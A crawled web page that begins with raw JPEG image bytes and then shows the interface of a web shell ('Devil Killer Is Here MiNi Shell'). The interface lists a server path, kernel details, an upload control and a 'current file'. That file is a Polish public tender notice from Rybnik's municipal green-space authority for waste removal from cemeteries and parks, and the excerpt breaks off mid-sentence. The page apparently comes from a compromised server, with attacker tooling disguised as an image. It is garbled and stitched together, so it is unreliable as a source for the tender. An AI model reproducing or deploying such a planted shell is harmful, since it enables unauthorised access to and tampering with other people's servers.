JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20241209/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20241209/0063964201-N-2024.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Usługi<br/> Wywóz stałych odpadów komunalnych </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">ZARZĄD ZIELENI MIEJSKIEJ</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 271505514</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">ul. Pod Lasem 64</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Rybnik</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">44-210</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">śląskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL227 - Rybnicki</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">zzm@zielen.rybnik.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">https://zielen.rybnik.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - inna państwowa jednostka organizacyjna nieposiadająca osobowości prawnej</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Inna działalność</span> </h3> <p class="mb-0"> zarządzanie zielenią miejską i cmentarzami </p> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Wywóz stałych odpadów komunalnych </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-91ceeee8-2e06-42db-926b-8a65b2f40118</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2024/BZP 00639642</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2024-12-09</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://ezamowienia.gov.pl/mp-client/search/list/ocds-148610-91ceeee8-2e06-42db-926b-8a65b2f40118 <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">https://ezamowienia.gov.pl, epuap, zamowienia.publiczne@zielen.rybnik.pl</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">korespondencja poprzez ESP, zamowienia.publiczne@zielen.rybnik.pl, formularz do komunikacji na stronie postępowania</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">ZP.2120.15.2024</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Usługi</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.5.) Wartość zamówienia: <span class="normal"> 160000 PLN </span> </h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 1. Przedmiot zamówienia obejmuje sukcesywne świadczenie usług w zakresie wywozu odpadów komunalnych. <br/> 2. Wywóz odpadów będzie się odbywał z następujących miejsc:<br/>1) cmentarz komunalny przy ul. Rudzka 70 b w Rybniku-Północ,<br/>2) cmentarz komunalny przy ul. Karłowej w Rybniku-Chwałęcicach,<br/>3) cmentarz komunalny przy ul. Zadumy 33 w Rybniku-Boguszowicach Starych,<br/>4) cmentarz komunalny przy ul. Kamiennej 8 w Rybniku - Chwałowicach,<br/>5) siedziba Zarządu Zieleni Miejskiej przy ul. Pod Lasem 64 w Rybniku,<br/>6) park „Kozie Góry” przy ul. Chwałowicka w Rybniku,<br/>7) park „Wiśniowiec” przy ul. L. Janiego w Rybniku,<br/>8) oddział ZZM przy ul. Rzecznej 8 w Rybniku.<br/> 3. Zakres rzeczowy przedmiotu zamówienia obejmuje;<br/>3.1. Dla Cmentarza Komunalnego przy ulicy Rudzkiej 70 b w Rybniku<br/>1) Rodzaj i kod odpadów:<br/> a) pozostałości po sprzątaniu grobów i otoczenia, ziemia i kamienie z wykopów pod groby <br/> (kod odpadu 20 02 - odpady z ogrodów i parków, w tym z cmentarzy, w szczególności:<br/> - 20 02 01 - odpady ulegające biodegradacji,<br/> - 20 02 02 - gleba i ziemia w tym kamienie,<br/> - 20 02 03 - inne odpady nie ulegające biodegradacji,<br/> - 20 01 02 – selektywnie gromadzone i segregowane odpady szklane,<br/> - 15 01 02 – opakowania z tworzyw sztucznych.<br/> 2) Wielkość i rodzaj kontenerów:<br/> Odpady gromadzone są obecnie w stanowiących własność Zamawiającego kontenerach na odpady komunalne typ KP - 7 (7m³), KP - 10 (10m³), zamknięte, załadunek hakowy, pojemnikach typu dzwon do segregacji odpadów (1500 l) przystosowane do rozładunku HDS.<br/>3.2. Dla Cmentarza Komunalnego przy ulicy Karłowej w Rybniku-Chwałęcicach<br/>1) Rodzaj i kod odpadów:<br/> a) pozostałości po sprzątaniu grobów i otoczenia, ziemia i kamienie z wykopów pod groby <br/> (kod odpadu 20 02 - odpady z ogrodów i parków, w tym z cmentarzy, w szczególności:<br/> - 20 02 01 - odpady ulegające biodegradacji,<br/> - 20 02 02 - gleba i ziemia w tym kamienie,<br/> - 20 02 03 - inne odpady nie ulegające biodegradacji,<br/> - 20 01 02 – selektywnie gromadzone i segregowane szklane odpady komunalne,<br/> - 15 01 02 – opakowania z tworzyw sztucznych..<br/>2) Wielkość i rodzaj kontenerów:<br/>Odpady gromadzone są obecnie w stanowiących własność Zamawiającego kontenerze na odpady komunalne typ KP - 7 (7m³), zamkniętym, załadunek hakowy oraz pojemnikach typu dzwon do segregacji odpadów (1500 l) przystosowanych do rozładunku HDS. <br/>3.3. Dla Cmentarza Komunalnego przy ulicy Zadumy 33 w Rybniku-Boguszowicach Starych<br/>1) Rodzaj i kod odpadów:<br/> a) pozostałości po sprzątaniu grobów i otoczenia, ziemia i kamienie z wykopów pod groby <br/> (kod odpadu 20 02 - odpady z ogrodów i parków, w tym z cmentarzy, w szczególności:<br/> - 20 02 01 - odpady ulegające biodegradacji,<br/> - 20 02 02 - gleba i ziemia w tym kamienie,<br/> - 20 02 03 - inne odpady nie ulegające biodegradacji,<br/> - 20 01 02 – selektywnie gromadzone i segregowane szklane odpady komunalne,<br/> - 15 01 02 – opakowania z tworzyw sztucznych.<br/>2) Wielkość i rodzaj kontenerów:<br/>Odpady gromadzone są obecnie w stanowiących własność Zamawiającego kontenerze na odpady komunalne typ KP - 7 (7m³), zamkniętym, załadunek hakowy oraz pojemnikach typu dzwon do segregacji odpadów (1500 l) przystosowanych do rozładunku HDS. <br/><br/>3.4. Dla Cmentarza Komunalnego przy ulicy Kamiennej 8 w Rybniku - Chwałowicach<br/>1) Rodzaj i kod odpadów:<br/> a) pozostałości po sprzątaniu grobów i otoczenia, ziemia i kamienie z wykopów pod groby <br/> (kod odpadu 20 02 - odpady z ogrodów i parków, w tym z cmentarzy, w szczególności:<br/> - 20 02 01 - odpady ulegające biodegradacji,<br/> - 20 02 02 - gleba i ziemia w tym kamienie,<br/> - 20 02 03 - inne odpady nie ulegające biodegradacji,<br/> - 20 01 02 – selektywnie gromadzone i segregowane szklane odpady komunalne,<br/> - 15 01 02 – opakowania z tworzyw sztucznych.<br/>2) Wielkość i rodzaj kontenerów:<br/>Odpady gromadzone są obecnie w stanowiących własność Zamawiającego kontenerach na odpady komunalne typ KP - 7 (7m³), KP - 10 (10m³), zamknięte, załadunek hakowy oraz w workach 120 l do segregacji odpadów.<br/>3.5. Dla siedziby ZZM Rybnik przy ulicy Pod Lasem 64 oraz oddział ZZM przy ul. Rzecznej 8 w Rybniku<br/>1) Rodzaj i kod odpadów:<br/> - 15 01 02 - opakowania z tworzyw sztucznych,<br/> - 20 01 02 - selektywnie gromadzone i segregowane szklane odpady komunalne,<br/> - 15 01 01 - opakowania z papieru i tektury,<br/> - 20 02 03 - inne odpady nie ulegające biodegradacji,<br/>2) Wielkość i rodzaj kontenerów:<br/>Odpady gromadzone są obecnie w stanowiących własność Zamawiającego w pojemnikach 1100 l i dzwonach/koszach 1500 l przystosowanych do rozładunku HDS.<br/>3.6. Dla parków „Kozie Góry” i „Wiśniowiec” w Rybniku<br/>1) Rodzaj i kod odpadów:<br/> - 15 01 02 - opakowania z tworzyw sztucznych,<br/>2) Wielkość i rodzaj kontenerów:<br/>Odpady gromadzone są obecnie w stanowiących własność Zamawiającego w dzwonach/koszach 1500 l przystosowanych do rozładunku HDS.<br/> 4. Zasady realizacji przedmiotu zamówienia:<br/> 4.1. Wykonawca w ramach realizacji zamówienia zobowiązany będzie do:<br/> - wywozu napełnionych kontenerów na odpady z cmentarzy,<br/> - dostarczenie kontenerów z odpadami do punktów utylizacji odpadów zgodnie z obowiązującymi przepisami,<br/>- odstawienie pustych kontenerów na te same miejsca,<br/>- opróżnienie pojemników z odpadami w miejscach wyszczególnionych w pkt. 2. 4.2. Usługi świadczone będą każdorazowo na zlecenie Zamawiającego. Zlecenia składane będą drogą elektroniczną (e-mail) od poniedziałku do piątku.<br/>4.3. Wykonanie usługi winno odbyć się w godzinach 7ºº - 15ºº od poniedziałku do piątku w terminie wynikającym z przedstawionej oferty, liczonym od chwili zgłoszenia zapotrzebowania wywozu odpadów.<br/>4.4. Każdorazowy wywóz winien być odnotowany w rejestrze wywozów prowadzonym przez zamawiającego i poświadczony przez Wykonawcę.<br/>4.5. Wykonawca winien zabezpieczyć tabor niezbędny do realizacji zamówienia.<br/>4.6. Wykonawca zobowiązany będzie przez cały okres obowiązywania umowy i wykonywania zamówienia do dysponowania stałą dostępną dla Zamawiającego łącznością telefoniczną oraz pocztą elektroniczną do przyjmowania zleceń na usługi. <br/>4.7. Wykonawca jest zobowiązany do naprawy lub ponoszenia kosztów napraw szkód wyrządzonych podczas lub w związku z wykonywaniem usługi powstałych z jego winy. Wykonawca ponosi pełną odpowiedzialność, wobec Zamawiającego i osób trzecich, za szkody na mieniu lub zdrowiu osób trzecich, powstałe podczas lub w związku z realizacją przedmiotu zamówienia.<br/>4.8. Wykonawca zobowiązany jest wstrzymać się od wykonywania usług na czas trwania na cmentarzu ceremonii pogrzebowych, jeżeli zakłócałyby ich przebieg.<br/>5. Prognozowana ilość wywozu kontenerów i opróżniania pojemników w okresie trwania zamówienia. Szacuje się, że w okresie wykonywania zamówienia Wykonawca dokona wywozu kontenerów i opróżniania pojemników w następujących ilościach: <br/>1) z terenu cmentarza komunalnego przy ul. Rudzka 70 b w Rybniku:<br/> a) kontener 7m³ (kod odpadu 20 02 03) - 105 wywozów, <br/> b) kontener 10 m³ (kod odpadu 20 02 03) - 18 wywozów, <br/> c) dzwony 1500 l (kod odpadu 20 01 02, 15 01 02) - 41 wywozów.<br/>2) z terenu cmentarza komunalnego przy ul. Karłowej w Rybniku:<br/> a) kontener 7m³ (kod odpadu 20 02 03) - 6 wywozów, -<br/> b) dzwony 1500 l (kod odpadu 20 01 02, 15 01 02) - 14 wywozów<br/>3) z terenu cmentarza komunalnego przy ul. Zadumy 33 w Rybniku:<br/> a) kontener 7m³ (kod odpadu 20 02 03) - 16 wywozów, <br/> b) dzwony 1500 l (20 01 02, 15 01 02) - 35 wywozów.<br/>4) z terenu cmentarza komunalnego ul. Kamienna 8 w Rybniku:<br/> a) kontener 7m³ (kod odpadu 20 02 03) - 13 wywozów, <br/> b) kontener 10 m³ (kod odpadu 20 02 03) - 12 wywozów, <br/> c) worki 120 l (kod odpadu 15 01 02, 20 01 02) - 150 sztuk do wywozu.<br/>5) z siedziby Zarządu Zieleni Miejskiej ul. Pod Lasem 64 i oddziału ZZM przy ul. Rzecznej 8 w Rybniku:<br/> a) pojemnik 1100 l (kod odpadu 20 02 03) - 18 wywozów<br/> b) dzwony/kosz 1500 l (kod odpadu 15 01 02, 15 01 01, 20 01 02) - 28 wywozów.<br/> 6) z parków Kozie Góry i Wiśniowiec w Rybniku: <br/> a) dzwony/kosz 1500 l (kod odpadu 15 01 02) - . wywóz 2 razy w roku z każdej lokalizacji.<br/>UWAGA!<br/>Podane ilości wywozów są wartościami szacunkowymi. <br/><br/>Wszystkie wymagania określone powyżej stanowią wymagania minimalne, a ich spełnienie jest obligatoryjne. Niespełnienie ww. wymagań minimalnych będzie skutkować odrzuceniem oferty jako niezgodnej z warunkami zamówienia na podstawie art 226 ust. 1 pkt.5 ustawy Pzp. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">90513200-8 - Usługi wywozu stałych odpadów miejskich</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja do --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">do 2025-12-31</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Punktowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> inne. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Termin wykonania</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 1</p> <p class="mb-0">Art. 109 ust. 1 pkt 2 lit a</p> <p class="mb-0">Art. 109 ust. 1 pkt 2 lit b</p> <p class="mb-0">Art. 109 ust. 1 pkt 2 lit c</p> <p class="mb-0">Art. 109 ust. 1 pkt 3</p> <p class="mb-0">Art. 109 ust. 1 pkt 4</p> <p class="mb-0">Art. 109 ust. 1 pkt 5</p> <p class="mb-0">Art. 109 ust. 1 pkt 6</p> <p class="mb-0">Art. 109 ust. 1 pkt 7</p> <p class="mb-0">Art. 109 ust. 1 pkt 8</p> <p class="mb-0">Art. 109 ust. 1 pkt 9</p> <p class="mb-0">Art. 109 ust. 1 pkt 10</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> 1. O udzielenia zamówienia mogą ubiegać się Wykonawcy, którzy:<br/> 1) nie podlegają wykluczeniu na podstawie art. 108 ust. 1 oraz art. 109 ust. 1 ustawy,<br/> 2) spełniają warunki udziału w postępowaniu dotyczące:<br/> a) zdolności do występowania w obrocie gospodarczym: Zamawiający nie stawia wymagań w tym zakresie,<br/> b) sytuacji ekonomicznej lub finansowej.<br/> Zamawiający nie określa warunku w tym zakresie.<br/> c) uprawnień do prowadzenia określonej działalności gospodarczej lub zawodowej, o ile wynika to z odrębnych przepisów – opis spełnienia warunku - wykonanie przedmiotu zamówienia wymaga posiadania specjalnych uprawnień tj.:<br/> a) uzyskanie wpisu do rejestru działalności regulowanej w zakresie odbierania odpadów komunalnych od właścicieli nieruchomości, prowadzonego przez wójta, burmistrza lub prezydenta miasta właściwego ze względu na miejsce odbierania odpadów komunalnych:<br/> - w odniesieniu do cmentarza komunalnego przy ul. Rudzka 70 b w Rybniku – Północ na terenie Gminy Miasta Rybnik,<br/> - w odniesieniu do cmentarza komunalnego przy ul. Karłowej w Rybniku – Chwałęcicach na terenie Gminy Miasta Rybnik,<br/> - w odniesieniu do cmentarza komunalnego przy ul. Zadumy 33 w Rybniku – Boguszowicach Starych na terenie Gminy Miasta Rybnik,<br/> - w odniesieniu do cmentarza komunalnego przy ul. Kamiennej 8 w Rybniku – Chwałowicach na terenie Gminy Miasta Rybnik,<br/> - w odniesieniu do siedziby Zarządu Zieleni Miejskiej przy ul. Pod Lasem 64 na terenie Gminy Miasta Rybnik,<br/> - w odniesieniu do parku „Kozie Góry” przy ul. Chwałowickiej na terenie Gminy Miasta Rybnik,<br/> - w odniesieniu do parku „Wiśniowiec”przy ul. L.Janiego na terenie Gminy Miasta Rybnik,<br/> - w odniesieniu do oddziału Zarządu Zieleni Miejskiej przy ul. Rzecznej 8 b na terenie Gminy Miasta Rybnik.<br/> -dokonanego zgodnie z art. 9c ustawy z dnia 13 września 1996r. o utrzymaniu czystości i porządku w gminach (tekst jednolity Dz.U. z 2021 r., poz. 888) i obejmuje swym zakresem rodzaj odpadów określonych w opisie przedmiotu zamówienia / rozdział II SWZ/.<br/> d) zdolności technicznej lub zawodowej – opis spełnienia warunku – wykonanie przedmiotu zamówienia wymaga posiadania :<br/> a) pojazdu specjalistycznego do transportu kontenerów z odpadami wyposażonego w hakowy system załadowczy – minimum 1 szt,<br/> b) pojazdu specjalistycznego przystosowanego do rozładunku HDS pojemników typu dzwon,<br/> c) pojazdu specjalistycznego przystosowanego do rozładunku pojemnika metalowego na 4 kółkach o poj 1100 l.<br/> e) wskażą instalację komunalną, do której będą przekazywane odbierane od Zamawiającego odpady komunalne. Należy podać nazwę i adres podmiotu zarządzającego instalacją oraz adres instalacji zgodnie z wykazem funkcjonujących na terenie danego województwa instalacji komunalnych – oświadczenie. <br/> <br/>W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia, żaden z nich nie może podlegać wykluczeniu z powodu niespełnienia warunków, o których mowa w art. 108 ust. 1 i art. 109 ust. 1 ustawy PZP.<br/>W przypadku zamówień, których wartość została wyrażona w umowie w innej walucie niż PLN należy dokonać przeliczenia tej waluty na PLN przy zastosowaniu średniego kursu NBP na dzień zakończenia zamówienia (w przypadku inwestycji rozliczanych wyłącznie w walutach innych niż PLN).<br/>2. Warunek udziału w postępowaniu dotyczący zdolności technicznej i zawodowej dotyczący wykonanych robót musi być spełniony: <br/> 1) przez Wykonawcę samodzielnie lub<br/> 2) przez minimum jeden podmiot (podwykonawcę) udostępniający doświadczenie samodzielnie; <br/> 3) w przypadku Wykonawców występujących wspólnie – samodzielnie przez minimum jednego z Wykonawców występujących wspólnie. <br/>Nie jest dopuszczalne łączenie (sumowanie) wyżej wymaganego doświadczenia w ramach doświadczenia różnych podmiotów zaangażowanych w realizację zamówienia. <br/>3. Wykonawca może w celu potwierdzenia spełniania warunków udziału w postępowaniu, w stosownych sytuacjach oraz w odniesieniu do konkretnego zamówienia, lub jego części, polegać na zdolnościach technicznych lub zawodowych lub sytuacji finansowej lub ekonomicznej innych podmiotów, niezależnie od charakteru prawnego łączących go z nim stosunków prawnych.<br/>4. Zamawiający ocenia, czy udostępniane Wykonawcy przez inne podmioty zdolności techniczne lub zawodowe lub ich sytuacja finansowa lub ekonomiczna, pozwalają na wykazanie przez Wykonawcę spełniania warunków udziału w postępowaniu oraz bada, czy nie zachodzą wobec tego podmiotu podstawy wykluczenia,<br/>5. W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia, żaden z nich nie może podlegać wykluczeniu z powodu niespełnienia warunków, o których mowa w art. 108 ust. 1 oraz art. 109 ust. 1 ustawy Pzp.<br/>6.Zamawiający może wykluczyć Wykonawcę na każdym etapie postępowania o zamówienie publiczne. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">1. Dokumenty i oświadczenia wymagane od wszystkich Wykonawców, które należy złożyć wraz z ofertą.<br/> 1) Formularz ofertowy.<br/> 2) Oświadczenie o niepodleganiu wykluczeniu z postępowania na formularzu zgodnym z treścią załącznika nr 2 do SWZ.<br/> 3) Oświadczenie o spełnianiu warunków udziału w postępowaniu na formularzu zgodnym z treścią załącznika nr 3 do SWZ.<br/> 4) Wykonawca, który polega na 